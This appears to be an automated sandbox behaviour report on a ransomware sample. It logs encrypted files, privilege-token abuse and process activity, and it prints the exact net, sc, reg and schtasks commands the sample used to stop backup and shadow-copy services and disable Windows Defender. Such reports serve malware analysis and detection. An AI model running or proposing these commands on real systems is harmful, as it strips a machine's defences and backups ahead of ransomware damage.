File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup-impl_zh_CN.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_LgAAAC4AAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-white_scale-100.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_FgAAABYAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\PREVIEW.GIF.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_LgAAAC4AAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\equalizer_window.html.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IAAAACAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVClientIsv.man.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IgAAACIAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.registry_3.5.400.v20140428-1507.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_BAAAAAQAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-pl.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_PgAAAD4AAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_GAAAABgAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_LgAAAC4AAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageAppList.targetsize-72_altform-unplated_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdXC2RVL_KMS_ClientC2R-ppd.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Grace-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\rsod\dcfmui.msi.16.en-us.tree.dat.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_IgAAACIAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Car\LTR\contrast-black\SmallTile.scale-125.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc-48.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Getstarted_8.2.22942.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GetStartedMedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.SkypeApp_14.53.77.0_neutral_split.scale-125_kzf8qxf38zg5c\Assets\Images\SkypeWideTile.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\nl-NL\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019VL_MAK_AE-ppd.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-pl.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Video-48.png.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AgAAAAIAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\LiveTile\10px.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedStoreLogo.scale-100_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_contrast-white.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ARIALNBI.TTF.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.XboxApp_48.49.31001.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_ja_4.4.0.v20140623020002.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-multiview_ja.jar.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_HAAAABwAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-phn.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdVL_KMS_Client-ul-oob.xrm-ms.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\AdjacencyReport.dotx.MPk5dR06sRKxcfX6wtd14uio0zkzaCHXYmDzC8xy0hD_AAAAAAAAAAA0.a1tft C:\Users\Admin\AppData\Local\Temp\ransomware.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1540 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 3284 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 3284 wrote to memory of 1456 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3284 wrote to memory of 1456 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 3200 wrote to memory of 464 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3200 wrote to memory of 464 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 1972 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1972 wrote to memory of 4128 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1972 wrote to memory of 4128 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 4284 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 4284 wrote to memory of 4496 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4284 wrote to memory of 4496 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 2392 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 2392 wrote to memory of 3308 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2392 wrote to memory of 3308 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 2176 wrote to memory of 4184 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2176 wrote to memory of 4184 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 4940 wrote to memory of 1348 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 4940 wrote to memory of 1348 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1540 wrote to memory of 1324 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\net.exe
PID 1324 wrote to memory of 2980 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1324 wrote to memory of 2980 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1540 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4768 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 3348 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\sc.exe
PID 1540 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 1328 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 908 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 1048 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 2984 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 3544 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe
PID 1540 wrote to memory of 4044 N/A C:\Users\Admin\AppData\Local\Temp\ransomware.exe C:\Windows\SYSTEM32\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ransomware.exe

"C:\Users\Admin\AppData\Local\Temp\ransomware.exe"

C:\Windows\SYSTEM32\net.exe

net.exe stop "SamSs" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SamSs" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SDRSVC" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SDRSVC" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "SstpSvc" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "SstpSvc" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_1819a" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_1819a" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_1819a" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

